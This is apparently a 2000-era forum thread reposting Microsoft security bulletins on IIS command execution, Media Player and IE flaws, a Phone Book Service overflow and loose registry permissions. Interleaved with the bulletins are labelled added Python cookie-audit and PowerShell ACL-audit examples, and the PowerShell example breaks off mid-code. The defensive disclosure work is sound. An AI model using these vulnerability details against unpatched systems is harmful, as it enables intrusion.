http://www.ietf.org/rfc/rfc2109.txt.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security http://www.acros.si/ and Ron Sires
and C. Conrad Cady of Healinx http://www.healinx.com/ for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 23, 2000: Bulletin Created.
- November 20, 2000: Bulletin updated to indicate availability of
updated patches for IIS 4.0 on Alpha platforms, and IIS 5.0
on x86 platforms.
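The secure-cookie behaviour defined in RFC 2109, which the patch adds to ASP, as an added example that is not part of the bulletin or of IIS: a small client-side cookie jar shows a session cookie issued without the Secure attribute being replayed to a plain http:// page on the same site, an audit function flags such a header, and a hardening function appends the attribute. The cookie name, value and host are constructed.

```python
"""Session ID cookies and the RFC 2109 Secure attribute (added example)."""
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass
class Cookie:
    """One cookie as a client would store it after a Set-Cookie header."""
    name: str
    value: str
    path: str = "/"
    secure: bool = False


def parse_set_cookie(header: str) -> Cookie:
    """Parse a Set-Cookie header value of the form
    'NAME=VALUE; attr; attr=value' (RFC 2109 style attributes)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "secure":
            cookie.secure = True      # RFC 2109: send only over a secure channel
        elif key == "path" and val.strip():
            cookie.path = val.strip()
    return cookie


@dataclass
class CookieJar:
    """Minimal client-side jar: keeps the latest cookie per name and decides
    which cookies accompany a request, honouring the Secure attribute."""
    cookies: dict = field(default_factory=dict)

    def store(self, header: str) -> Cookie:
        cookie = parse_set_cookie(header)
        self.cookies[cookie.name] = cookie
        return cookie

    def cookies_for(self, url: str) -> list:
        """Names of the cookies the client would attach to a request for url.
        A cookie without Secure is also sent over plain http: that is the
        plaintext exposure the bulletin describes."""
        parsed = urlparse(url)
        over_tls = parsed.scheme == "https"
        path = parsed.path or "/"
        return [c.name for c in self.cookies.values()
                if path.startswith(c.path) and (over_tls or not c.secure)]


def audit_set_cookie(header: str, issued_over_tls: bool) -> list:
    """Server-side check: report a cookie issued over SSL that lacks the
    Secure attribute (the pre-patch ASP behaviour)."""
    cookie = parse_set_cookie(header)
    findings = []
    if issued_over_tls and not cookie.secure:
        findings.append(
            f"{cookie.name}: issued over a secure page without Secure; "
            "the browser will also send it in plaintext to http:// pages")
    return findings


def harden_set_cookie(header: str) -> str:
    """Return the header with the Secure attribute appended if it is missing."""
    if parse_set_cookie(header).secure:
        return header
    return header.rstrip().rstrip(";") + "; Secure"


if __name__ == "__main__":
    # Constructed sample: a session cookie the secure page issued over SSL.
    weak = "SESSIONID=abc123; path=/"
    jar = CookieJar()
    jar.store(weak)
    print("weak cookie sent to http page:",
          jar.cookies_for("http://example.test/news.asp"))
    print("audit:", audit_set_cookie(weak, issued_over_tls=True))
    fixed = harden_set_cookie(weak)
    jar.store(fixed)
    print("fixed header:", fixed)
    print("fixed cookie sent to http page:",
          jar.cookies_for("http://example.test/news.asp"))
    print("fixed cookie sent to https page:",
          jar.cookies_for("https://example.test/account.asp"))
```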
socalgal
11-21-2000, 08:27 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-086)
- --------------------------------------
Patch Available for "Web Server File Request Parsing" Vulnerability
Originally posted: November 06, 2000
Updated: November 21, 2000
Summary
=======
On November 06, 2000, Microsoft released the original version of this
bulletin, announcing the availability of a patch that eliminates a
security vulnerability in Microsoft(r) Internet Information Services
5.0. The vulnerability could enable a malicious user to run
operating system commands on a web server. On November 10, 2000, we
updated the bulletin to clarify the scope of the issue. On November
21, 2000, we updated it again, to discuss two newly-discovered
variants of the original vulnerability.
The new variants don't change the effect of exploiting the
vulnerability. However, they do affect a larger number of products.
The original variant affected IIS 5.0 in all cases, but only affected
IIS 4.0 when a service pack prior to Windows NT 4.0 Service Pack 6a
was in use. The new variants affect both IIS 4.0 and IIS 5.0
regardless of which service pack is in use. Microsoft recommends that
all affected customers apply the new versions of the patches.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
Issue
=====
When IIS receives a valid request for an executable file, it passes
the name of the requested file to the underlying operating system
for processing. However, due to an implementation flaw, it is
possible to create a specially-malformed file request that contains
both a file name and one or more operating system commands. Upon
receiving such a request, IIS would pass the entire string to the
operating system, which would first process the file and then execute
the commands.
The ability to execute operating system commands on the web server
would enable a malicious user to take virtually any action that an
interactively-logged on user could take. Although this would not give
the malicious user administrative control over the server, it would
nevertheless enable him to cause widespread damage. He could, for
instance, add, delete or change files on the server, run code that
was already on the server, or upload code of his choice and run it.
There are three significant restrictions on the type of file request that
could be used to exploit this vulnerability:
- The malicious user would need to request a .bat or .cmd file.
- The file would need to exist.
- The malicious user would need to have execute permissions on
the file.
Although these restrictions limit the scope of the vulnerability, it
is important not to discount it. Many third-party software products
for web servers install batch files by default. As a result,
Microsoft recommends that all customers running affected versions of
IIS verify whether their systems contain any .bat or .cmd files that
can be executed by visitors to the site, and apply the patch
immediately if this is the case. The patch for this issue also
eliminates the "Web Server Directory Traversal" vulnerability
discussed in Microsoft Security Bulletin MS00-078.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Patch Availability
==================
- Internet Information Server 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q277873
- Internet Information Services 5.0:
http://www.microsoft.com/Windows2000/downloads/critical/q277873
Note: The IIS 5.0 patch can be applied atop systems running either
Windows 2000 Gold or Service Pack 1. It will be included in Windows
2000 Service Pack 2.
Note: The IIS 4.0 patch can be applied atop systems running Windows
NT 4.0 Service Pack 6a. It will be included in Windows NT 4.0
Service Pack 7.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-086,
http://www.microsoft.com/technet/security/bulletin/fq00-086.asp
- Microsoft Knowledge Base (KB) article Q277873,
http://www.microsoft.com/technet/support/kb.asp?ID=277873
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks NSFocus http://www.nsfocus.com for reporting the
original and new variants of this vulnerability to us and working
with us to protect customers.
Revisions
=========
- November 06, 2000: Bulletin Created.
- November 10, 2000: Bulletin updated to indicate that IIS 4.0
is affected when running on pre-SP6 versions of Windows NT 4.0,
and to provide information on additional restrictions on the
vulnerability.
- November 21, 2000: Bulletin updated to discuss availability of
patch that addresses new variants of vulnerability.
socalgal
11-21-2000, 08:32 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-089)
- --------------------------------------
Patch Available for "Domain Account Lockout" Vulnerability
Originally posted: November 21, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 2000. The vulnerability could
allow a malicious user to use repeated attempts to guess an account
password even if the domain administrator had set an account lockout
policy.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-089.asp
Issue
=====
A flaw in the way that NTLM authentication operates in Windows 2000
could allow a domain account lockout policy to be bypassed on a
local Windows 2000 machine, even if the domain administrator had set
such a policy. The ability of a malicious user to avoid the domain
account lockout policy could increase the threat from a brute force
password-guessing attack.
This vulnerability only affects Windows 2000 machines that are
members of non-Windows 2000 domains. In addition, the vulnerability
only affects domain user accounts that have previously logged into
the target machine and already have cached credentials established on
that machine. If a domain account lockout policy is in place and an
attacker attempts a brute force password-guessing attack, the domain
user account will be locked out as expected at the domain
controller. However, if the attacker is able to find the correct
password, the local Windows 2000 machine will log the attacker on
using cached credentials in violation of the account lockout policy.
Although the attacker would be able to log on to the local machine,
he or she would not be able to authenticate to the domain or gain
access to resources on other machines in the domain.
Affected Software Versions
==========================
- Microsoft Windows 2000 Professional, Service Pack 1
- Microsoft Windows 2000 Server, Service Pack 1
- Microsoft Windows 2000 Advanced Server, Service Pack 1
- Microsoft Windows 2000 Datacenter, Service Pack 1
Note: Windows 2000 Gold is not affected by this vulnerability.
Note: Windows 2000 users connected to a Windows 2000 domain, stand
alone Windows 2000 machines, and users of NT 4.0 do not need to take
any action.
Note: The Windows 2000 patch can be applied to systems running
Windows 2000 Service Pack 1. Users of Windows 2000 Gold are not
affected and do not need to take any action. This patch will be
included in Windows 2000 Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-089,
http://www.microsoft.com/technet/security/bulletin/fq00-089.asp
- Microsoft Knowledge Base article Q274372 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Finch Brett (mailto:brett.finch@hrs.ualberta.ca),
Human Resources, University of Alberta, for reporting this issue to
us and working with us to protect customers.
Revisions
=========
- November 21, 2000: Bulletin Created.
socalgal
11-23-2000, 09:02 AM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-090)
- --------------------------------------
Patch Available for ".ASX Buffer Overrun" and ".WMS Script Execution"
Vulnerabilities
Originally posted: November 22, 2000
Summary
=======
Microsoft has released a patch that eliminates two security
vulnerabilities in Microsoft(r) Windows Media(tm) Player. These
vulnerabilities could potentially enable a malicious user to cause a
program of his choice to run on another user's computer.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
Issue
=====
The two vulnerabilities discussed below are unrelated to each other
except by the fact that they both affect Windows Media Player. We
packaged them in a single patch to make it more convenient for
customers to apply. The vulnerabilities are:
- The ".ASX Buffer Overrun" vulnerability. Windows Media
Player supports the use of Active Stream Redirector (.ASX)
files to enable users to play streaming media that resides
on intranet or Internet sites. However, the code that parses
.ASX files has an unchecked buffer, and this could potentially
enable a malicious user to run code of his choice on the
machine of another user. The malicious user could either send
an affected file to another user and entice her to run or
preview it, or he could host such a file on a web site and
cause it to launch automatically whenever a user visited the
site. The code could take any action on the machine that the
legitimate user herself could take.
- The ".WMS Script Execution" vulnerability. Windows Media
Player 7 introduced a feature called "skins", that allows
customization of the look and feel of Windows Media Player.
However, a custom skin (.WMS) file could potentially include
script, which would execute if Windows Media Player was run
and that skin was selected. A malicious user could either send
a customized skin containing script to another user and try to
entice her into using it, or he could host such a file on a web
site and cause it to launch automatically whenever a user
visited the site. Because the code would reside on the user's
local machine, it would be able to execute ActiveX controls,
including ones not marked "safe for scripting". This would
enable the code to take any action that can be accomplished
via an ActiveX control.
Affected Software Versions
==========================
- Microsoft Windows Media Player 6.4
- Microsoft Windows Media Player 7
Note: The ".ASX Buffer Overrun" affects Windows Media Player versions
6.4 and 7. The ".WMS Script Execution" affects only Windows Media
Player version 7. The patch installs the correct fix(es) for the
particular version of Windows Media Player in use.
Patch Availability
==================
- Windows Media Player 6.4:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Windows Media Player 7:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067
Note: The fix for this issue also will be available as part of the
next periodic update, scheduled for December 2000.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-090,
http://www.microsoft.com/technet/security/bulletin/fq00-090.asp
- Microsoft Knowledge Base article Q280419 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft thanks the following people:
- AtStake (http://www.atstake.com) for reporting the ".ASX
Buffer Overrun" issue to us and working with us to protect
customers.
- GFI (http://gfi.com) for reporting the ".WMS Script Execution"
vulnerability to us and working with us to protect customers.
Revisions
=========
- November 22, 2000: Bulletin Created.
socalgal
11-30-2000, 09:41 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Resending due to a bad signature on a previous mailer.
We are in the process of changing our bulletin mailing format for
better customer satisfaction. If you have any feedback please send
mailto:secfdbck@microsoft.com.
=================================================================
Issue: Vulnerability of NBT service on Microsoft Windows NT
4.0, Windows 9x and Windows Me.
Date: 30 November 2000
Affected Software: Windows NT 4.0, Windows 9x and Me.
Impact: Denial of Service
Bulletin ID: MS00-091
Bulletin: http://www.microsoft.com/technet/security/bulletin/ms00-091.asp
Acknowledgment: BindView Razor Team (http://razor.bindview.com)
socalgal
12-01-2000, 07:17 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
- -----------------------------------------------------------------
Issue: Print template feature could allow web site to run code on visiting user's machine; web form could be used to read user's files.
Acknowledgment: Juan Carlos Garcia Cuartango (www.s21sec.com)
Vladimir Sulc, jr. (www.microrisc.cz)
Warren Greer
******************
Microsoft Security Bulletin (MS00-093)
Patch Available for "Browser Print Template" and "File Upload via Form" Vulnerabilities
Originally posted: December 01, 2000
Summary
Microsoft has released a patch that eliminates four security vulnerabilities in Microsoft® Internet Explorer:
The “Browser Print Template” vulnerability, which could enable a malicious web site operator to take unauthorized actions on the computer of a user who visited her site.
The “File Upload via Form” vulnerability, which could enable a malicious web site operator to read files on a visiting user’s computer.
New variants of the “Scriptlet Rendering” and “Frame Domain Verification” vulnerabilities, both of which could enable a malicious web site operator to read files on a visiting user’s computer.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-093.asp
Issue
The three security vulnerabilities eliminated by this patch are unrelated to each other except by the fact that they all occur in the same .dll. We have packaged the fix for all three issues together in one updated .dll together for customer convenience.
The vulnerabilities are:
The “Browser Print Template” vulnerability, which affects IE 5.5 only. IE 5.5 introduces a new feature known as Print Templates, which provides the ability to customize how browser pages will look when they’re previewed and printed. A vulnerability exists in the feature that would enable a web application to invoke a custom print template without garnering approval from the user. This poses a security hazard because Print templates are, by design, trusted code and therefore able to execute ActiveX controls, even ones that are not marked as safe for scripting.
The “File Upload via Form” vulnerability, which affects IE versions 5.0 through 5.5. The INPUT TYPE element supports a variety of methods of providing input via HTML forms, one of which allows the user to specify the name of a file to upload to the site. Subject to a number of constraints, it could be possible for a web application to fill in this field with the name of a desired file and then submit the form.
A new variant of the “Scriptlet Rendering” vulnerability, which affects IE version 5.0 through 5.5. The original variant, discussed in Microsoft Security Bulletin MS00-055, involved the ability to render non-HTML file types. This could enable a malicious web site operator to provide bogus information consisting of script, solely for the purpose of introducing it into an IE system file with a known name, then render the file to execute the script. The net effect would be to make the script run in the Local Computer Zone, at which point it could access files on the user's local file system. The new variant operates in exactly the same way, but uses a different mechanism to render the file.
A new variant of the “Frame Domain Verification” vulnerability, which affects IE versions 5.5 through 5.0. As discussed in Microsoft Security Bulletin MS00-033 and MS00-055, several functions do not enforce proper separation of frames in the same window that reside in different domains. The new variant involves an additional function with the same flaw. The net effect of the vulnerability would be to enable a malicious web site operator to open two frames, one in his domain and another on the user’s local file system, and enable the latter to pass information to the former. This patch eliminates all known variants of this vulnerability.
Note: The patch requires IE 5.5 SP1 or IE 5.01 SP1 to install. Customers who install this patch on other versions may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q279328.
Note: Although one of the vulnerabilities discussed here only affects IE 5.5, the patch above is suitable for installation on either IE 5.5 SP1 or IE 5.01 SP1. The patch will detect the version of IE and only install the needed components.
Note: Per the normal security support policy for IE, security patches for Internet Explorer version 4.x are no longer being produced. Microsoft recommends that IE 4.x customers who are concerned about this issue consider upgrading to either IE 5.5 or IE 5.01 SP1.
Note: The fix for this issue will be included in IE 5.5 SP1 and IE 5.01 SP2.
Note: Additional security patches are available at the Microsoft Download Center
More Information
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-093, http://www.microsoft.com/technet/security/bulletin/fq00-093.asp
Microsoft Knowledge Base article Q279328 discusses the “Browser Print Template” and will be available soon.
Microsoft Knowledge Base article Q279329 discusses the “File Upload via Form” vulnerability and will be available soon.
Microsoft Knowledge Base article Q279881 discusses the new variant of the “Scriptlet Rendering” vulnerability and will be available soon.
Microsoft Knowledge Base article Q279330 discusses the new variant of the “Frame Domain Verification” vulnerability and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
Microsoft thanks the following people for working with us to protect customers:
Warren R. Greer for reporting the “Browser Print Template” issue to us.
Juan Carlos Garcia Cuartango (www.s21sec.com) and Vladimir Sulc, jr. (www.microrisc.cz) for reporting the “File Upload via Form” vulnerability to us.
Revisions
December 01, 2000: Bulletin Created.
socalgal
12-04-2000, 07:04 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
- --------------------------------------------------------------------
Issue: Buffer Overflow in Phone Book Service
Microsoft Security Bulletin (MS00-094)
Patch Available for "Phone Book Service Buffer Overflow" Vulnerability
Originally posted: December 04, 2000
Summary
Microsoft has released a patch that eliminates a security vulnerability in an optional service that ships with Microsoft® Windows NT® 4.0 and Windows® 2000 Servers. The vulnerability could allow a malicious user to execute hostile code on a remote server that is running the service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-094.asp
Issue
The Phone Book Service is an optional component that ships with the NT 4 Option Pack and Windows 2000. This Service is used in conjunction with Dial Up Networking clients to provide computers with a pre-populated list of dial-up networking servers.
Due to an unchecked buffer in the Phone Book Service, a particular type of malformed URL could be used to execute arbitrary code on an IIS 4 or IIS 5 web server running the Phone Book Service. This would potentially enable a malicious user to gain privileges on the machine commensurate with those of the IUSR_machinename account (IIS 4) or the IWAM_machinename account (IIS 5). The IUSR account and the IWAM account are members of the Everyone group. In some instances, members of the Everyone group, including the accounts above, are able to execute operating system commands on the web server.
Although this vulnerability would not grant the malicious user administrative level privileges, it would give the malicious user the ability to add, change or delete specific data, run code already on the server, or upload new code to the server and run it.
Phone Book Services are not installed by default on IIS 4 and IIS 5 servers. Instead, this service must be specifically installed via the NT 4 Option Pack or Windows 2000 Optional Networking Components. Customers who have not installed this service would not be at risk from this vulnerability.
Affected Software Versions
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
NOTE: The Phone Book Service can only be installed on IIS 4 or IIS 5 servers.
Patch Availability
Microsoft Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26193
Microsoft Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25531
NOTE: The NT 4.0 fix can be applied to systems running NT 4.0 Service Pack 6a. This fix will be included in NT 4.0 Service Pack 7. The Windows 2000 fix can be applied to Windows 2000 Gold or Service Pack 1. This fix will be included in Windows 2000 Service Pack 2.
Note: Additional security patches are available at the Microsoft Download Center
More Information
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-094, http://www.microsoft.com/technet/security/bulletin/fq00-094.asp
Microsoft Knowledge Base article Q276575 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
Microsoft thanks CORE-SDI (www.core-sdi.com) and @Stake (www.stake.com) for reporting this issue to us and working with us to protect customers.
Revisions
December 04, 2000: Bulletin Created.
socalgal
12-06-2000, 07:36 PM
Acknowledgment: Chris Anley of @stake (http://www.atstake.com)
Milan Dadok
Glenn Larsson
=============================================
Microsoft Security Bulletin (MS00-095)
Tool Available for “Registry Permissions” Vulnerability
Originally posted: December 06, 2000
Summary:
Microsoft has released a tool that corrects the permissions on several registry values in Microsoft® Windows NT® 4.0. The default permissions could allow a malicious user to gain additional privileges on an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-095.asp
Issue:
Three registry keys have default permissions that are inappropriately loose.
The keys, and the risk they pose, are as follows:
The “SNMP Parameters” key, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters, provides the SNMP community name and SNMP management station identifiers, if they exist. Reading this information would enable a malicious user to pose as a bona fide SNMP manager for any community the affected machine belonged to. (In actuality, though, the same information could be obtained by monitoring network traffic). Changing this information would enable her to create a community consisting solely of her local machine, as a way of gaining management privileges on it. SNMP is not installed on Windows NT 4.0 machines by default.
The “RAS Administration” key, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RAS, provides a way to install third-party RAS products that work with the Windows NT native RAS service. By changing one of the values in this key, it would be possible for a malicious user to specify code of her choice as a third-party management tool. The code would then run in the LocalSystem security context. Although it might be possible to make the needed registry changes remotely, the malicious user’s code would need to reside on the affected machine itself. RAS is not installed on Windows NT 4.0 machines by default.
The “MTS Package Administration” key, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Transaction Server\Packages, includes information about which users are allowed to install and change MTS packages. By adding herself as an MTS manager, a malicious user could gain the ability to add, delete or change MTS packages. Although it might be possible in some cases to make the needed registry changes remotely, the malicious user would still need the ability to log onto the affected machine interactively in order to exercise her new privileges. MTS is not installed on Windows NT 4.0 machines by default.
In addition to correcting the permissions on these keys, the tool also changes the permissions on several other keys that have previously been discussed. Specifically, the tool makes all the changes discussed in Microsoft Security Bulletins MS00-008 and MS00-024.
Affected Software Versions:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Note: The version of the tool in this bulletin also includes all changes discussed in Security Bulletins MS00-008 and MS00-024.
Note: This tool may be run on machines running Windows NT 4.0 Service Packs 5 and 6a.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-095, http://www.microsoft.com/technet/security/bulletin/fq00-095.asp
Microsoft Security Bulletin MS00-008, http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
Microsoft Security Bulletin MS00-024, http://www.microsoft.com/technet/security/bulletin/ms00-024.
Microsoft Knowledge Base article Q265714 discusses the "SNMP Parameters" vulnerability and will be available soon.
Microsoft Knowledge Base article Q267861 discusses the "RAS Administration" vulnerability and will be available soon.
Microsoft Knowledge Base article Q267864 discusses the "MTS Package Administration" vulnerability and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
Microsoft thanks the following people for working with us to protect customers:
Chris Anley of @stake for reporting the “SNMP Parameters” vulnerability.
Milan Dadok for reporting the "RAS Administration" vulnerability.
Glenn Larsson for reporting the “MTS Package Administration” vulnerability.
Revisions
December 06, 2000: Bulletin Created.
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
socalgal
12-06-2000, 07:41 PM
=============================================
Issue: Wrong permissions on SNMP registry key
Date: 06 December 2000
Affected Software: Windows 2000
Impact: Usurp management privileges on SNMP devices
Acknowledgment: Chris Anley of @stake (http://www.atstake.com)
=============================================
Microsoft Security Bulletin (MS00-096)
Tool Available for “SNMP Parameters” Vulnerability
Originally posted: December 06, 2000
Summary:
Microsoft has released a tool that corrects the permissions on several registry values in Microsoft® Windows® 2000. The default permissions could allow a malicious user to monitor or reconfigure certain devices on a network.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-096.asp
Issue:
This vulnerability is virtually identical to the “SNMP Parameters” vulnerability affecting Windows NT® 4.0 systems and discussed in Microsoft Security Bulletin MS00-095.
The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters provides the SNMP community name and SNMP management station identifiers, if they exist. Reading this information would enable a malicious user to pose as a bona fide SNMP manager for any community her machine belonged to. Changing this information would enable her to create a community consisting solely of her local machine, as a way of gaining management privileges on it.
It should be noted that the information revealed by this vulnerability is normally transmitted in plaintext across SNMP-managed networks. As a result, even in the absence of incorrect registry permissions, a malicious user could carry out the same attack if she could monitor network communications. SNMP is not installed on Windows 2000 machines by default.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: The Security Configuration and Analysis template provided in the patch can be applied to any Windows 2000 system.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-096, http://www.microsoft.com/technet/security/bulletin/fq00-096.asp
Microsoft Security Bulletin MS00-095, http://www.microsoft.com/technet/security/bulletin/MS00-095.asp
Microsoft Knowledge Base article Q266794 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Chris Anley of @stake (http://www.atstake.com) for reporting this issue to us and working with us to protect customers.
Revisions:
December 06, 2000: Bulletin Created.
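As an added example (not part of either bulletin, nor of the Microsoft tool they describe), here is a defender-side PowerShell check that audits the three keys named in MS00-095 and the SNMP key from MS00-096 and reports access entries that let broad principals modify the keys, or read the SNMP parameters where the community names themselves are the secret. The key paths come from the bulletins; the list of "broad" principals and the choice to treat only the SNMP key as read-sensitive are assumptions.

```powershell
# Added example, not part of the bulletins: audit the ACLs on the registry keys
# named in MS00-095 / MS00-096 and report entries that grant broad principals
# write access (and, for the SNMP key, read access). Run from an elevated
# PowerShell prompt on the host being checked.

$AuditKeys = @(
    # Key paths are taken from the bulletins; the ReadIsSensitive flag is an assumption.
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\SNMP\Parameters'; ReadIsSensitive = $true  }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\RAS';                            ReadIsSensitive = $false }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Transaction Server\Packages';    ReadIsSensitive = $false }
)

# Principals that should not be able to change (or, for SNMP, read) these keys.
# This list is an assumption; extend it to match your environment.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Test-SensitiveRegistryAcl {
    param(
        [Parameter(Mandatory)] [hashtable[]] $Keys,
        [Parameter(Mandatory)] [string[]]    $Principals
    )

    # Rights that let a caller alter values, add subkeys, or rewrite the ACL itself.
    $writeMask = [System.Security.AccessControl.RegistryRights] (
        'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership, WriteKey, FullControl')
    # Rights that expose the stored values (community names, in the SNMP case).
    $readMask  = [System.Security.AccessControl.RegistryRights] 'QueryValues, ReadKey, FullControl'

    foreach ($key in $Keys) {
        if (-not (Test-Path -Path $key.Path)) {
            # The bulletins note that SNMP, RAS and MTS are not installed by default;
            # a missing key means the component, and therefore the exposure, is absent.
            [pscustomobject]@{ Key = $key.Path; Identity = '-'; Rights = '-'; Finding = 'key not present' }
            continue
        }

        $acl = Get-Acl -Path $key.Path
        foreach ($ace in $acl.Access) {
            # Only Allow entries for the broad principals are of interest here.
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Principals -notcontains $ace.IdentityReference.Value) { continue }

            $rights = [int] $ace.RegistryRights
            if (($rights -band [int] $writeMask) -ne 0) {
                [pscustomobject]@{
                    Key      = $key.Path
                    Identity = $ace.IdentityReference.Value
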